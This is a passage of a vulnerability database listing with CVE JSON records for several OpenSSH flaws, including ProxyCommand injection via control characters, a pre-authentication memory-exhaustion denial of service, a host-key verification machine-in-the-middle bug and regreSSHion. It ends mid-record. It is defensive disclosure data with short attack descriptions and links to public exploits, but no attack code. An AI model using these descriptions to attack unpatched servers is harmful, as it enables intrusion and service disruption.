Search criteria
376 vulnerabilities found for OpenSSH by OpenBSD
CVE-2025-61985 (GCVE-0-2025-61985)
Vulnerability from cvelistv5 – Published: 2025-10-06 00:00 – Updated: 2025-10-06 18:34- CWE-158 - Improper Neutralization of Null Byte or NUL Character
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-61985",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-06T18:33:49.712677Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-06T18:34:24.777Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "OpenSSH",
"vendor": "OpenBSD",
"versions": [
{
"lessThan": "10.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"versionEndExcluding": "10.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ssh in OpenSSH before 10.1 allows the \u0027\\0\u0027 character in an ssh:// URI, potentially leading to code execution when a ProxyCommand is used."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-158",
"description": "CWE-158 Improper Neutralization of Null Byte or NUL Character",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-06T18:19:08.824Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.openwall.com/lists/oss-security/2025/10/06/1"
},
{
"url": "https://marc.info/?l=openssh-unix-dev\u0026m=175974522032149\u0026w=2"
},
{
"url": "https://www.openssh.com/releasenotes.html#10.1p1"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-61985",
"datePublished": "2025-10-06T00:00:00.000Z",
"dateReserved": "2025-10-06T00:00:00.000Z",
"dateUpdated": "2025-10-06T18:34:24.777Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-61984 (GCVE-0-2025-61984)
Vulnerability from cvelistv5 – Published: 2025-10-06 00:00 – Updated: 2025-11-11 14:50- CWE-159 - Improper Handling of Invalid Use of Special Elements
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-61984",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-07T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-08T03:55:09.867Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://dgl.cx/2025/10/bash-a-newline-ssh-proxycommand-cve-2025-61984"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-11T14:50:56.007Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/10/07/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/10/12/1"
},
{
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-61984-detection-script-remote-code-execution-vulnerability-affecting-openssh"
},
{
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-61984-mitigation-script-remote-code-execution-vulnerability-affecting-openssh"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "OpenSSH",
"vendor": "OpenBSD",
"versions": [
{
"lessThan": "10.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"versionEndExcluding": "10.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ssh in OpenSSH before 10.1 allows control characters in usernames that originate from certain possibly untrusted sources, potentially leading to code execution when a ProxyCommand is used. The untrusted sources are the command line and %-sequence expansion of a configuration file. (A configuration file that provides a complete literal username is not categorized as an untrusted source.)"
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-159",
"description": "CWE-159 Improper Handling of Invalid Use of Special Elements",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-06T18:17:49.959Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.openwall.com/lists/oss-security/2025/10/06/1"
},
{
"url": "https://marc.info/?l=openssh-unix-dev\u0026m=175974522032149\u0026w=2"
},
{
"url": "https://www.openssh.com/releasenotes.html#10.1p1"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-61984",
"datePublished": "2025-10-06T00:00:00.000Z",
"dateReserved": "2025-10-06T00:00:00.000Z",
"dateUpdated": "2025-11-11T14:50:56.007Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-32728 (GCVE-0-2025-32728)
Vulnerability from cvelistv5 – Published: 2025-04-10 00:00 – Updated: 2025-05-08 13:11- CWE-440 - Expected Behavior Violation
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-32728",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-10T18:35:34.531350Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-10T18:35:46.150Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-05-08T13:11:19.684Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://security.netapp.com/advisory/ntap-20250425-0002/"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00008.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "OpenSSH",
"vendor": "OpenBSD",
"versions": [
{
"lessThan": "10.0",
"status": "affected",
"version": "7.4",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"versionEndExcluding": "10.0",
"versionStartIncluding": "7.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In sshd in OpenSSH before 10.0, the DisableForwarding directive does not adhere to the documentation stating that it disables X11 and agent forwarding."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-440",
"description": "CWE-440 Expected Behavior Violation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-10T01:40:34.658Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://lists.mindrot.org/pipermail/openssh-unix-dev/2025-April/041879.html"
},
{
"url": "https://www.openssh.com/txt/release-10.0"
},
{
"url": "https://github.com/openssh/openssh-portable/commit/fc86875e6acb36401dfc1dfb6b628a9d1460f367"
},
{
"url": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.6/common/013_ssh.patch.sig"
},
{
"url": "https://www.openssh.com/txt/release-7.4"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-32728",
"datePublished": "2025-04-10T00:00:00.000Z",
"dateReserved": "2025-04-10T00:00:00.000Z",
"dateUpdated": "2025-05-08T13:11:19.684Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-26466 (GCVE-0-2025-26466)
Vulnerability from cvelistv5 – Published: 2025-02-28 21:25 – Updated: 2025-11-06 23:33- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Affected:
9.5p1 , ≤ 9.9p1
(custom)
|
||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-03T21:12:57.326Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://security.netapp.com/advisory/ntap-20250228-0002/"
},
{
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/1"
},
{
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/4"
},
{
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1237041"
},
{
"url": "https://security-tracker.debian.org/tracker/CVE-2025-26466"
},
{
"url": "https://ubuntu.com/security/CVE-2025-26466"
},
{
"url": "http://seclists.org/fulldisclosure/2025/May/8"
},
{
"url": "http://seclists.org/fulldisclosure/2025/May/7"
},
{
"url": "http://seclists.org/fulldisclosure/2025/Feb/18"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-26466",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-04T19:51:35.555196Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-04T19:51:39.308Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.qualys.com/2025/02/18/openssh-mitm-dos.txt"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://www.openssh.com/",
"defaultStatus": "unaffected",
"packageName": "OpenSSH",
"repo": "https://anongit.mindrot.org/openssh.git",
"versions": [
{
"lessThanOrEqual": "9.9p1",
"status": "affected",
"version": "9.5p1",
"versionType": "custom"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "unaffected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
}
],
"datePublic": "2025-02-18T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the OpenSSH package. For each ping packet the SSH server receives, a pong packet is allocated in a memory buffer and stored in a queue of packages. It is only freed when the server/client key exchange has finished. A malicious client may keep sending such packages, leading to an uncontrolled increase in memory consumption on the server side. Consequently, the server may become unavailable, resulting in a denial of service attack."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T23:33:10.047Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2025-26466"
},
{
"name": "RHBZ#2345043",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345043"
},
{
"url": "https://seclists.org/oss-sec/2025/q1/144"
},
{
"url": "https://www.qualys.com/2025/02/18/openssh-mitm-dos.txt"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-02-11T19:51:30.375000+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2025-02-18T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Openssh: denial-of-service in openssh",
"workarounds": [
{
"lang": "en",
"value": "This issue can be mitigated by setting the following three different options in the sshd configuration file located at: /etc/ssh/sshd_config\n\nMaxStartups: Set to a reasonable value, this option controls the maximum number of concurrent unauthenticated connections the SSH server accepts;\n\nPerSourcePenalties: Set its suboptions to a reasonable value, this option is used to help sshd to detect and drop connections that are potentially malicious for the SSH server;\n\nLoginGraceTime: Set to a resonable value, this option controls how much time the SSH server will wait the client to authenticate before dropping its connection;\n\nAll the three option above needs to be set to implement a full mitigation for this vulnerability."
}
],
"x_redhatCweChain": "CWE-770: Allocation of Resources Without Limits or Throttling"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2025-26466",
"datePublished": "2025-02-28T21:25:28.861Z",
"dateReserved": "2025-02-10T18:31:47.979Z",
"dateUpdated": "2025-11-06T23:33:10.047Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-26465 (GCVE-0-2025-26465)
Vulnerability from cvelistv5 – Published: 2025-02-18 18:27 – Updated: 2025-11-06 23:33- CWE-390 - Detection of Error Condition Without Action
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Affected:
6.8p1 , ≤ 9.9p1
(custom)
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-03T21:12:55.938Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00020.html"
},
{
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/1"
},
{
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/4"
},
{
"url": "https://www.theregister.com/2025/02/18/openssh_vulnerabilities_mitm_dos/"
},
{
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1237040"
},
{
"url": "https://security-tracker.debian.org/tracker/CVE-2025-26465"
},
{
"url": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.6/common/008_ssh.patch.sig"
},
{
"url": "https://ubuntu.com/security/CVE-2025-26465"
},
{
"url": "https://www.openssh.com/releasenotes.html#9.9p2"
},
{
"url": "https://blog.qualys.com/vulnerabilities-threat-research/2025/02/18/qualys-tru-discovers-two-vulnerabilities-in-openssh-cve-2025-26465-cve-2025-26466"
},
{
"url": "https://lists.mindrot.org/pipermail/openssh-unix-announce/2025-February/000161.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20250228-0003/"
},
{
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-26465-detect-vulnerable-openssh"
},
{
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-26465-mitigate-vulnerable-openssh"
},
{
"url": "http://seclists.org/fulldisclosure/2025/May/8"
},
{
"url": "http://seclists.org/fulldisclosure/2025/May/7"
},
{
"url": "http://seclists.org/fulldisclosure/2025/Feb/18"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-26465",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-19T15:02:09.369445Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-19T15:02:45.555Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://seclists.org/oss-sec/2025/q1/144"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://www.openssh.com/",
"defaultStatus": "unaffected",
"packageName": "OpenSSH",
"repo": "https://anongit.mindrot.org/openssh.git",
"versions": [
{
"lessThanOrEqual": "9.9p1",
"status": "affected",
"version": "6.8p1",
"versionType": "custom"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::appstream",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.0p1-26.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::appstream",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.0p1-26.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-45.el9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-45.el9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.4::baseos",
"cpe:/a:redhat:rhel_eus:9.4::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9.4 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-38.el9_4.5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:discovery:1.14::el9"
],
"defaultStatus": "affected",
"packageName": "discovery/discovery-server-rhel9",
"product": "Red Hat Discovery 1.14",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "sha256:ad1045aa0de937c3a6969ec377f7bfeda9a44ee434a954e8245e9840316ffc1c",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unknown",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "affected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
}
],
"datePublic": "2025-02-17T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in OpenSSH when the VerifyHostKeyDNS option is enabled. A machine-in-the-middle attack can be performed by a malicious machine impersonating a legit server. This issue occurs due to how OpenSSH mishandles error codes in specific conditions when verifying the host key. For an attack to be considered successful, the attacker needs to manage to exhaust the client\u0027s memory resource first, turning the attack complexity high."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-390",
"description": "Detection of Error Condition Without Action",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T23:33:09.945Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2025:16823",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:16823"
},
{
"name": "RHSA-2025:3837",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:3837"
},
{
"name": "RHSA-2025:6993",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:6993"
},
{
"name": "RHSA-2025:8385",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:8385"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2025-26465"
},
{
"url": "https://access.redhat.com/solutions/7109879"
},
{
"name": "RHBZ#2344780",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2344780"
},
{
"url": "https://seclists.org/oss-sec/2025/q1/144"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-02-10T21:56:03.853000+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2025-02-17T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Openssh: machine-in-the-middle attack if verifyhostkeydns is enabled",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_redhatCweChain": "CWE-390: Detection of Error Condition Without Action"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2025-26465",
"datePublished": "2025-02-18T18:27:16.843Z",
"dateReserved": "2025-02-10T18:31:47.978Z",
"dateUpdated": "2025-11-06T23:33:09.945Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-6387 (GCVE-0-2024-6387)
Vulnerability from cvelistv5 – Published: 2024-07-01 12:37 – Updated: 2025-11-11 16:12- CWE-364 - Signal Handler Race Condition
| URL | Tags | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Affected:
8.5p1 , ≤ 9.7p1
(custom)
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-6387",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-02T13:18:34.695298Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-02T13:18:46.662Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-04-24T18:35:27.934Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://www.vicarius.io/vsociety/posts/regresshion-an-openssh-regression-error-cve-2024-6387"
},
{
"url": "https://www.exploit-db.com/exploits/52269"
},
{
"url": "https://packetstorm.news/files/id/190587/"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/01/12"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/01/13"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/02/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/11"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/2"
},
{
"tags": [
"x_transferred"
],
